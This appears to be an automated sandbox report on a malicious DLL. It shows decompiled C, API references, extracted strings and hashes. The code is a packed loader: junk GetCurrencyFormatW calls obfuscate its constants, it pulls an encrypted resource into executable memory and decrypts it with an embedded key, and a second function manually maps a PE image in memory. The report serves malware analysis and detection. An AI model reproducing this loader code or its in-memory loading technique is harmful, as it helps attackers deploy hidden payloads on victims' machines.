						 *0x10046a6c = E10001688(_v92, 0x2c4bdae9);
						 *0x10046a48 = E10001688(_v92, 0x640963da);
						_t277 = E10001688(_v92, 0xfa5d867);
						_t334 = _t330 + 0x100;
						 *0x10046a44 = _t277; // executed
						_t278 = FindResourceW(_v80, 0x3275, 0x10036c5c); // executed
						_v84 = _t278;
						_v92 = LoadResource(_v80, _t278);
						_t280 = SizeofResource(_v80, _v84);
						_push(0x22b9);
						_push(_t326);
						_v88 = _t280;
						_t338 =  *0x10046a3c; // 0x76c866e0
						_push(0);
						_push(_t312);
						_push(0x11d4);
						_push(0);
						if(_t338 == 0) {
							_v84 = GetCurrencyFormatW() *  *0x100440d0 + 0x2000;
							_t285 = GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9);
							_t291 = GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc + 0x00001000 | _v84;
							__eflags = _t291;
							_t292 = VirtualAlloc(0, _v88, _t291, _t285 *  *0x100440cc + 0x40);
						} else {
							_v84 = GetCurrencyFormatW() *  *0x100440e0 + 0x2000;
							_t292 =  *0x10046a3c(0xffffffff, 0, _v88, GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440cc + 0x00001000 | _v84, GetCurrencyFormatW(0, 0x11d4, _t312, 0, _t326, 0x22b9) *  *0x100440e0 + 0x40, 0); // executed
						}
						_t313 = _v88;
						_t324 = _t292;
						memcpy(_t292, _v92, _v88);
						_t294 = malloc(0x4708); // executed
						_t321 = _t294;
						E100018D8(0xed9e0cf, 0x96c3a441, 0x245e78a3, _t321, "u+OUr@Gnw7WU8wvzF2sdn!scsb&WO4vzuGAs+!StYXj!by7msWucK*_MI_o)m(", 0x3f);
						E10001B36(0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t321, _t292, _v88);
						 *0x10046a64(_t321);
						_t298 = E100042CA(_t324, _t313);
						_t330 = _t334 + 0x4c;
						 *0x10046a8c = _t298;
						 *0x10046a88(_v80);
						_pop(_t319);
						_t322 = 1;
						_t311 = 0;
						goto L6;
					}
				}
				return E1001FBB5(_t183, _t311, _v4 ^ _t330, _t318, _t319, _t322);
			}

0x100042f6
0x100042f6
0x100042f6
0x100042f6
0x100042f6
0x100042f6
0x100042f9
0x10004300
0x10004308
0x10004310
0x10004311
0x10004b56
0x10004b58
0x10004317
0x10004317
0x1000431c
0x1000431e
0x10004b5b
0x10004b60
0x10004b66
0x10004b66
0x10004324
0x10004324
0x10004325
0x10004326
0x1000432d
0x10004333
0x1000433a
0x10004347
0x1000434c
0x10004351
0x10004356
0x1000435b
0x10004360
0x10004365
0x1000436a
0x10004371
0x10004378
0x1000437f
0x10004386
0x1000438d
0x10004394
0x1000439b
0x100043a2
0x100043a9
0x100043b0
0x100043b7
0x100043be
0x100043c3
0x100043ca
0x100043d1
0x100043d8
0x100043df
0x100043e6
0x100043ed
0x100043f4
0x100043fb
0x10004402
0x10004407
0x1000440e
0x10004415
0x1000441c
0x10004423
0x1000442a
0x10004431
0x10004438
0x1000443f
0x10004446
0x1000444d
0x10004467
0x10004483
0x1000449c
0x100044bb
0x100044d7
0x100044f3
0x1000450f
0x1000452b
0x10004547
0x10004563
0x1000457f
0x10004598
0x100045b7
0x100045d3
0x100045ef
0x1000460b
0x10004627
0x10004643
0x1000465f
0x1000467b
0x10004694
0x100046b3
0x100046cf
0x100046eb
0x10004707
0x10004723
0x1000473f
0x1000475b
0x10004777
0x10004790
0x100047a3
0x100047cd
0x100047f4
0x10004824
0x10004836
0x10004849
0x1000485c
0x1000486f
0x10004882
0x10004895
0x100048a8
0x100048be
0x100048d1
0x100048e4
0x100048f7
0x10004901
0x1000491d
0x10004930
0x10004943
0x10004959
0x1000496c
0x1000497f
0x10004992
0x100049a5
0x100049b8
0x100049cb
0x100049d0
0x100049d5
0x100049e6
0x100049eb
0x100049f6
0x10004a04
0x10004a0c
0x10004a12
0x10004a17
0x10004a18
0x10004a1e
0x10004a24
0x10004a25
0x10004a26
0x10004a27
0x10004a28
0x10004a9e
0x10004aa2
0x10004ac9
0x10004ac9
0x10004ad3
0x10004a2a
0x10004a38
0x10004a7c
0x10004a7c
0x10004ad9
0x10004ae2
0x10004ae5
0x10004af0
0x10004afd
0x10004b0f
0x10004b26
0x10004b2f
0x10004b37
0x10004b3c
0x10004b47
0x10004b4c
0x10004b52
0x10004b53
0x10004b55
0x00000000
0x10004b55
0x1000431e
0x10004b76

APIs

Part of subcall function 100036FA: _malloc.LIBCMT ref: 10003700

GetCurrencyFormatW.KERNEL32 ref: 10004452
GetCurrencyFormatW.KERNEL32 ref: 1000446E
GetCurrencyFormatW.KERNEL32 ref: 1000448A
GetCurrencyFormatW.KERNEL32 ref: 100044A6
GetCurrencyFormatW.KERNEL32 ref: 100044C2
GetCurrencyFormatW.KERNEL32 ref: 100044DE
GetCurrencyFormatW.KERNEL32 ref: 100044FA
GetCurrencyFormatW.KERNEL32 ref: 10004516
GetCurrencyFormatW.KERNEL32 ref: 10004532
GetCurrencyFormatW.KERNEL32 ref: 1000454E
GetCurrencyFormatW.KERNEL32 ref: 1000456A
GetCurrencyFormatW.KERNEL32 ref: 10004586
GetCurrencyFormatW.KERNEL32 ref: 100045A2
GetCurrencyFormatW.KERNEL32 ref: 100045BE
GetCurrencyFormatW.KERNEL32 ref: 100045DA
GetCurrencyFormatW.KERNEL32 ref: 100045F6
GetCurrencyFormatW.KERNEL32 ref: 10004612
GetCurrencyFormatW.KERNEL32 ref: 1000462E
GetCurrencyFormatW.KERNEL32 ref: 1000464A
GetCurrencyFormatW.KERNEL32 ref: 10004666
GetCurrencyFormatW.KERNEL32 ref: 10004682
GetCurrencyFormatW.KERNEL32 ref: 1000469E
GetCurrencyFormatW.KERNEL32 ref: 100046BA
GetCurrencyFormatW.KERNEL32 ref: 100046D6
GetCurrencyFormatW.KERNEL32 ref: 100046F2
GetCurrencyFormatW.KERNEL32 ref: 1000470E
GetCurrencyFormatW.KERNEL32 ref: 1000472A
GetCurrencyFormatW.KERNEL32 ref: 10004746
GetCurrencyFormatW.KERNEL32 ref: 10004762
GetCurrencyFormatW.KERNEL32 ref: 1000477E
GetCurrencyFormatW.KERNEL32 ref: 1000479A

Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 1000155F
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 100015B5
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 100015DF
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001606
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001639
Part of subcall function 10001534: GetCurrencyFormatW.KERNEL32 ref: 10001668

Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016B0
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016D0
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100016E8
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001710
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001731
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001757
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001770
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 1000179B

Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017B7
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017DF
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100017FA
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001826
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001844
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001879

Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 10001899
Part of subcall function 10001688: GetCurrencyFormatW.KERNEL32 ref: 100018BE

FindResourceW.KERNELBASE(?,00003275,10036C5C), ref: 100049EB
LoadResource.KERNEL32(?,00000000), ref: 100049FA
SizeofResource.KERNEL32(?,?), ref: 10004A0C
GetCurrencyFormatW.KERNEL32 ref: 10004A2A
GetCurrencyFormatW.KERNEL32 ref: 10004A49
GetCurrencyFormatW.KERNEL32 ref: 10004A62
VirtualAllocExNuma.KERNELBASE(000000FF,00000000,?,?), ref: 10004A7C
GetCurrencyFormatW.KERNEL32 ref: 10004A84
GetCurrencyFormatW.KERNEL32 ref: 10004AA2
GetCurrencyFormatW.KERNEL32 ref: 10004ABB
VirtualAlloc.KERNEL32(00000000,?,?), ref: 10004AD3
memcpy.MSVCRT ref: 10004AE5
malloc.MSVCRT ref: 10004AF0
??3@YAXPAX@Z.MSVCRT ref: 10004B2F
_printf.LIBCMT ref: 10004B60

Strings

m, xrefs: 100046B3
c, xrefs: 10004707
r, xrefs: 1000449C
xadqsavcbdfewescGADW, xrefs: 10004333, 10004338, 10004460, 1000447C, 10004498, 100044B4, 100044D0, 100044EC, 10004508, 10004524, 10004540, 1000455C, 10004578, 10004594, 100045B0, 100045CC, 100045E8, 10004604, 10004620, 1000463C, 10004658, 10004674, 10004690, 100046AC, 100046C8, 100046E4, 10004700, 1000471C, 10004738, 10004754, 10004770, 1000478C, 10004A17, 10004A44, 10004A5B, 10004A92, 10004AB4
e, xrefs: 100044D7
v, xrefs: 100046EB
k, xrefs: 10004467
., xrefs: 10004643
e, xrefs: 10004483
n, xrefs: 100044BB
l, xrefs: 10004790
l, xrefs: 1000457F
d, xrefs: 100045EF
s, xrefs: 100046CF
l, xrefs: 1000460B
d, xrefs: 10004563
., xrefs: 10004547
n, xrefs: 100045B7
l, xrefs: 10004598
l, xrefs: 100047A3
d, xrefs: 10004777
t, xrefs: 1000473F
d, xrefs: 1000465F
u+OUr@Gnw7WU8wvzF2sdn!scsb&WO4vzuGAs+!StYXj!by7msWucK*_MI_o)m(, xrefs: 10004AF8
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 1000433A, 1000433F, 10004463, 1000447F, 1000449B, 100044B7, 100044D3, 100044EF, 1000450B, 10004527, 10004543, 1000455F, 1000457B, 10004597, 100045B3, 100045CF, 100045EB, 10004607, 10004623, 1000463F, 1000465B, 10004677, 10004693, 100046AF, 100046CB, 100046E7, 10004703, 1000471F, 1000473B, 10004757, 10004773, 1000478F, 10004A25, 10004A46, 10004A5F, 10004A95, 10004AB8
., xrefs: 1000475B
l, xrefs: 100044F3
3, xrefs: 1000450F
l, xrefs: 10004694
t, xrefs: 100045D3

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat$Resource$AllocVirtual$??3@FindLoadNumaSizeof_malloc_printfmallocmemcpy
String ID: .$.$.$3$c$d$d$d$d$e$e$eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$k$l$l$l$l$l$l$l$m$n$n$r$s$t$t$u+OUr@Gnw7WU8wvzF2sdn!scsb&WO4vzuGAs+!StYXj!by7msWucK*_MI_o)m($v$xadqsavcbdfewescGADW
API String ID: 3325861097-4060776750
Opcode ID: 66ea2a91fe368a831aadb18a4e90e5ef0f40db8b5cb4f279c8b13da558b103b3
Instruction ID: abf1217519c19ffa8c1e819e0abff0726c6fc8cdfe709489ff9e1ea74d27783b
Opcode Fuzzy Hash: 66ea2a91fe368a831aadb18a4e90e5ef0f40db8b5cb4f279c8b13da558b103b3
Instruction Fuzzy Hash: 8922A074544314BAF315DB91CE8AF0BBBECEF8A744F015509F740AA2A0D772A5248F6B

Uniqueness

Uniqueness Score: -1.00%

Function 100039A9 Relevance: 111.0, APIs: 60, Strings: 3, Instructions: 767
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E100039A9(void* __eflags, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* _v0;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				int _v48;
				intOrPtr* _v52;
				int _v56;
				int _v60;
				intOrPtr* _v64;
				void* __esi;
				signed int _t155;
				signed int _t166;
				signed int _t186;
				int _t187;
				signed int _t193;
				signed int _t198;
				void* _t202;
				signed int _t205;
				signed int _t210;
				int _t223;
				signed int _t224;
				signed int _t227;
				intOrPtr* _t234;
				signed int _t235;
				intOrPtr _t238;
				signed int _t242;
				signed int _t275;
				signed int _t283;
				signed short* _t286;
				intOrPtr* _t302;
				signed int _t306;
				intOrPtr* _t307;
				signed int _t308;
				signed int _t323;
				int _t336;
				int _t343;
				intOrPtr* _t407;
				short* _t447;
				int* _t448;
				int* _t449;

				_t448 =  &_v60;
				_t447 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v44 = 0;
				_t155 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _a8, _t155 *  *0x100440d0 + 0x40) != 0) {
					if(( *_a4 & 0x0000ffff) != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x5a4d) {
						goto L1;
					}
					_t166 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
					if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _a8, _t166 *  *0x100440d8 + _a4[0x1e] + 0xf8) == 0) {
						goto L1;
					}
					_v56 = _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + _a4[0x1e];
					if( *_v56 != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 0x4550 || ( *(_v56 + 4) & 0x0000ffff) != GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + 0x14c || ( *(_v56 + 0x38) & GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x00000001) != 0) {
						goto L1;
					} else {
						_t186 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t187 = _v56;
						_v40 =  *((intOrPtr*)(_t187 + 0x38));
						_v52 = ( *(_t187 + 0x14) & 0x0000ffff) + _t186 *  *0x100440d8 * 0x28 + _t187 + 0x18;
						_v48 = 0;
						if(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + ( *(_v56 + 6) & 0x0000ffff) == 0) {
							L15:
							_t193 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							 *0x10046a40(); // executed
							_t198 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t202 = E10001DE9(_t198 *  *0x100440e0 + _v36, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v60 + 0x50)));
							 *_t448 = 0x22b9;
							_v52 = _t202 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", _t448 + 0x28 + _t193 *  *0x100440d8 * 0x24) *  *0x100440d8;
							_t205 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							if(_v52 != E10001DE9(_t205 *  *0x100440e0 + _v36, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + _v48)) {
								goto L1;
							}
							_t210 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_v44 = _t210 *  *0x100440d4 + 0x2000;
							_t223 = _a8(GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v60 + 0x34)), _v52, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 0x00001000 | _v44, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 4, _a28);
							_t449 =  &(_t448[5]);
							_v56 = _t223;
							if(_t223 != 0) {
								L18:
								_t224 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
								_t227 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
								_v44 = HeapAlloc(GetProcessHeap(), _t227 *  *0x100440dc + 8, _t224 *  *0x100440d0 + 0x40);
								_t234 = _v44 + (GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6);
								_v64 = _t234;
								if(_t234 != 0) {
									 *((intOrPtr*)(_t234 + 4)) = _v56;
									_t235 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									_t238 = _v64;
									asm("sbb ecx, ecx");
									 *(_t238 + 0x14) =  ~( ~(_t235 *  *0x100440dc + 0x00002000 &  *(_v60 + 0x16) & 0x0000ffff));
									 *((intOrPtr*)(_t238 + 0x1c)) = _a8;
									 *((intOrPtr*)(_t238 + 0x20)) = _a12;
									 *((intOrPtr*)(_t238 + 0x24)) = _a16;
									 *((intOrPtr*)(_t238 + 0x28)) = _a20;
									 *((intOrPtr*)(_t238 + 0x2c)) = _a24;
									 *((intOrPtr*)(_t238 + 0x34)) = _a28;
									 *((intOrPtr*)(_v64 + 0x3c)) = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + _v36;
									_t242 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									if(E10001E20(_a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8, _t242 *  *0x100440cc +  *((intOrPtr*)(_v60 + 0x54))) == 0) {
										L28:
										E10003567(_v64);
										goto L1;
									}
									_v48 = _a8(_v56, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *((intOrPtr*)(_v60 + 0x54)), GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 4, _a28);
									memcpy(_v48, _v0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v60 + 0x54)));
									_v44 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 * 0xf8;
									 *_v64 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + _v44 + _v48 +  *((intOrPtr*)(_v0 + 0x3c));
									 *((intOrPtr*)( *_v64 + 0x34)) = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + _v56;
									_t275 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									if(E10001E51(_v0, _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8, _v60, (_t275 *  *0x100440d0 << 6) + _v64) == 0) {
										goto L28;
									}
									_t283 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
									_t407 = _v64;
									_t286 = _t283 *  *0x100440cc +  *((intOrPtr*)( *_t407 + 0x34)) -  *((intOrPtr*)(_v60 + 0x34));
									_a4 = _t286;
									if(_t286 == 0) {
										 *((intOrPtr*)(_t407 + 0x18)) = 1;
									} else {
										_t308 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9);
										_a4 = E1000290C((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6) + _v64, _a4 + _t308 *  *0x100440d8);
										 *((intOrPtr*)(_v64 + 0x18)) = _a4 + GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0;
									}
									if(E10002BDE((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 << 6) + _v64) == 0 || E10002482((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 6) + _v64) == 0 || E10002863((GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 << 6) + _v64) == 0) {
										goto L28;
									} else {
										_t302 = _v64;
										if( *((intOrPtr*)( *_t302 + 0x28)) == 0) {
											 *((intOrPtr*)(_t302 + 0x38)) = 0;
											return _t302;
										}
										_push(0x22b9);
										_push(L"xadqsavcbdfewescGADW");
										_push(0);
										_push(_t447);
										_push(0x11d4);
										_push(0);
										if( *((intOrPtr*)(_t302 + 0x14)) == 0) {
											 *((intOrPtr*)(_v64 + 0x38)) = GetCurrencyFormatW() *  *0x100440d0 +  *((intOrPtr*)( *_v64 + 0x28)) + _v56;
										} else {
											_t306 = GetCurrencyFormatW();
											_t307 = _v64;
											 *0x10046a88 = _t306 *  *0x100440d0 +  *((intOrPtr*)( *_t307 + 0x28)) + _v56;
											 *((intOrPtr*)(_t307 + 0x10)) = 1;
										}
										return _v64;
									}
								}
								_a12(_v56, 0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 + 0x8000, _a28);
								goto L1;
							}
							_t323 = GetCurrencyFormatW(_t223, 0x11d4, _t447, _t223, L"xadqsavcbdfewescGADW", 0x22b9);
							_v44 = _t323 *  *0x100440d0 + 0x2000;
							_t336 = _a8(0, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v52, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x00001000 | _v44, GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + 4, _a28);
							_t449 =  &(_t449[5]);
							_v56 = _t336;
							if(_t336 == 0) {
								goto L1;
							}
							goto L18;
						}
						_v52 = _v52 + 0xc;
						do {
							_push(0x22b9);
							_push(L"xadqsavcbdfewescGADW");
							_push(0);
							_push(_t447);
							_push(0x11d4);
							_push(0);
							if( *((intOrPtr*)(_v52 + 4)) != 0) {
								_t343 = GetCurrencyFormatW() *  *0x100440d4 +  *_v52 +  *((intOrPtr*)(_v52 + 4));
							} else {
								_t343 = GetCurrencyFormatW() *  *0x100440d4 +  *_v52 + _v40;
							}
							_v60 = _t343;
							if(_v60 > GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v44) {
								_v44 = GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc + _v60;
							}
							_v48 = _v48 + 1;
							_v52 = _v52 + 0x28;
						} while (_v48 < GetCurrencyFormatW(0, 0x11d4, _t447, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + ( *(_v56 + 6) & 0x0000ffff));
						goto L15;
					}
				}
				L1:
				return 0;
			}

0x100039a9
0x100039c4
0x100039d1
0x100039d5
0x10003a05
0x10003a31
0x00000000
0x00000000
0x10003a3f
0x10003a7a
0x00000000
0x00000000
0x10003aa6
0x10003abe
0x00000000
0x10003b11
0x10003b1d
0x10003b28
0x10003b3e
0x10003b4c
0x10003b50
0x10003b67
0x10003c26
0x10003c32
0x10003c43
0x10003c55
0x10003c85
0x10003c8a
0x10003cb9
0x10003cbd
0x10003cf4
0x00000000
0x00000000
0x10003d0b
0x10003d29
0x10003d7a
0x10003d7e
0x10003d83
0x10003d87
0x10003e14
0x10003e20
0x10003e39
0x10003e5f
0x10003e75
0x10003e77
0x10003e7b
0x10003ebd
0x10003ec0
0x10003edb
0x10003ee1
0x10003ee5
0x10003eec
0x10003ef3
0x10003f00
0x10003f09
0x10003f11
0x10003f1b
0x10003f3b
0x10003f3e
0x10003f72
0x100041d1
0x100041d5
0x00000000
0x100041da
0x10003fe4
0x10004001
0x10004031
0x1000405b
0x1000407e
0x10004081
0x100040be
0x00000000
0x00000000
0x100040d0
0x100040d9
0x100040e6
0x100040e9
0x100040ed
0x10004155
0x100040ef
0x100040fb
0x10004139
0x10004150
0x10004150
0x10004181
0x00000000
0x100041e0
0x100041e0
0x100041eb
0x10004244
0x00000000
0x10004244
0x100041f0
0x100041f1
0x100041f6
0x100041f7
0x100041f8
0x100041f9
0x100041fa
0x1000423b
0x100041fc
0x100041fc
0x10004207
0x10004214
0x1000421a
0x1000421a
0x00000000
0x1000423e
0x10004181
0x10003ea1
0x00000000
0x10003ea5
0x10003d97
0x10003db5
0x10003e01
0x10003e05
0x10003e0a
0x10003e0e
0x00000000
0x00000000
0x00000000
0x10003e0e
0x10003b74
0x10003b78
0x10003b7c
0x10003b7d
0x10003b87
0x10003b88
0x10003b89
0x10003b8a
0x10003b8b
0x10003bb1
0x10003b8d
0x10003b9c
0x10003b9c
0x10003bc0
0x10003bd5
0x10003bf0
0x10003bf0
0x10003bf4
0x10003bf8
0x10003c1c
0x00000000
0x10003b78
0x10003abe
0x10003a07
0x00000000

APIs

GetCurrencyFormatW.KERNEL32 ref: 100039D5
GetCurrencyFormatW.KERNEL32 ref: 100039EE

Part of subcall function 10001E20: GetCurrencyFormatW.KERNEL32 ref: 10001E38

GetCurrencyFormatW.KERNEL32 ref: 10003A1A
GetCurrencyFormatW.KERNEL32 ref: 10003A3F
GetCurrencyFormatW.KERNEL32 ref: 10003A63
GetCurrencyFormatW.KERNEL32 ref: 10003A88
GetCurrencyFormatW.KERNEL32 ref: 10003AAA
GetCurrencyFormatW.KERNEL32 ref: 10003AD0
GetCurrencyFormatW.KERNEL32 ref: 10003AFA
GetCurrencyFormatW.KERNEL32 ref: 10003B1D

Strings

(, xrefs: 10003BF8
xadqsavcbdfewescGADW, xrefs: 100039BC, 100039E3, 10003A0F, 10003A34, 10003A58, 10003A7D, 10003A96, 10003AC5, 10003AEF, 10003B12, 10003B39, 10003B7D, 10003BB5, 10003BD8, 10003BFE, 10003C27, 10003C4A, 10003C69, 10003C91, 10003CAC, 10003CD1, 10003D00, 10003D1E, 10003D3B, 10003D5E, 10003D8E, 10003DAA, 10003DC7, 10003DE6, 10003E15, 10003E2E, 10003E54, 10003E82, 10003EB2, 10003EFB, 10003F30, 10003F50, 10003F7D, 10003F96, 10003FB1, 10003FD9, 1000400B, 10004026, 10004052, 10004073, 10004097, 100040C5, 100040F0, 1000410A, 1000412E, 1000415D, 10004184, 100041AB, 100041F1
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 100039C4, 100039C9, 100039EA, 10003A16, 10003A3B, 10003A5F, 10003A84, 10003A9D, 10003ACC, 10003AF6, 10003B19, 10003B45, 10003B88, 10003BBC, 10003BDF, 10003C05, 10003C2E, 10003C51, 10003C70, 10003C98, 10003CB3, 10003CD8, 10003D07, 10003D25, 10003D42, 10003D65, 10003D94, 10003DB1, 10003DCE, 10003DED, 10003E1C, 10003E35, 10003E5B, 10003E8A, 10003EB9, 10003F10, 10003F37, 10003F57, 10003F84, 10003F9D, 10003FB8, 10003FE0, 10004012, 1000402D, 10004059, 1000407A, 1000409E, 100040CC, 100040F7, 10004111, 10004135, 10004164, 1000418B, 100041B2, 100041F7

Memory Dump Source

